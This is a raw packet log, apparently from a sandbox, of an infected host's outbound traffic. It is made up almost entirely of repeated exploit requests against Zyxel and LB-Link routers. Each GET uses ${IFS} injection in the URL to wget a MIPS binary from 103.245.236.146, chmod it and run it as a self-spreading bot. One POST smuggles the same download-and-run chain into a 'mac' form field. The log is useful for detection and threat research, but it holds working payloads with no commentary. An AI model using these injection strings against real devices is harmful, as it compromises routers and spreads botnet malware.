                                                Jan 28, 2024 10:16:17.701504946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2607192.168.2.234340693.145.170.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.703047991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2608192.168.2.234235438.153.21.2048080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.685379028 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:18.815988064 CET1286INHTTP/1.0 400 Bad Request
                                                Server: squid/3.1.9
                                                Mime-Version: 1.0
                                                Date: Sat, 03 Jun 2017 03:42:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 3175
                                                X-Squid-Error: ERR_INVALID_URL 0
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2609192.168.2.233671485.204.136.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700048923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2610192.168.2.2345880190.107.98.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700061083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2611192.168.2.2345500157.59.36.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700124025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2612192.168.2.235738689.250.155.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700155973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2613192.168.2.233461681.6.140.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700196028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2614192.168.2.2349296219.142.125.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700227022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2615192.168.2.2338312153.166.30.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700267076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2616192.168.2.235416267.17.215.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700284004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2617192.168.2.2339938159.195.24.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700325966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2618192.168.2.2342108165.89.229.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700371981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2619192.168.2.234016849.227.119.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700411081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2620192.168.2.234985295.204.232.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700428963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2621192.168.2.2336558200.8.209.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700438023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2622192.168.2.2358700191.223.15.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700457096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2623192.168.2.2340732219.235.41.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700496912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2624192.168.2.2334242113.132.238.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700531006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2625192.168.2.2358218182.2.143.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700558901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2626192.168.2.2345840113.219.196.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700586081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2627192.168.2.2342632213.109.204.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700614929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2628192.168.2.2336430131.98.174.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700665951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2629192.168.2.2348634173.220.54.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700678110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2630192.168.2.2337160152.154.147.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700715065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2631192.168.2.2356292109.26.29.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700745106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2632192.168.2.2345738130.64.75.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700783014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2633192.168.2.2348626128.173.92.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700814009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2634192.168.2.233932896.219.36.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700817108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2635192.168.2.233920291.77.145.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700844049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2636192.168.2.2351396162.133.219.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700867891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2637192.168.2.2357632180.70.166.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700906992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2638192.168.2.234859238.216.124.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700936079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2639192.168.2.2351424135.151.43.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.700973034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2640192.168.2.2340060132.29.104.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701006889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2641192.168.2.2334854202.85.81.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701059103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2642192.168.2.2345804103.122.234.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701071024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2643192.168.2.2333380170.159.44.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701109886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2644192.168.2.235273493.161.226.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701128006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2645192.168.2.235270419.120.223.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701157093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2646192.168.2.235969635.123.168.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701193094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2647192.168.2.233798667.185.236.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701220989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2648192.168.2.2345066135.176.2.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701220989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2649192.168.2.23575122.141.81.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701258898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2650192.168.2.235393892.95.17.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701281071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2651192.168.2.234092862.51.229.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701325893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2652192.168.2.2357392170.193.49.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701363087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2653192.168.2.234276865.195.135.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:18.701380014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2654192.168.2.2345272153.163.69.199443
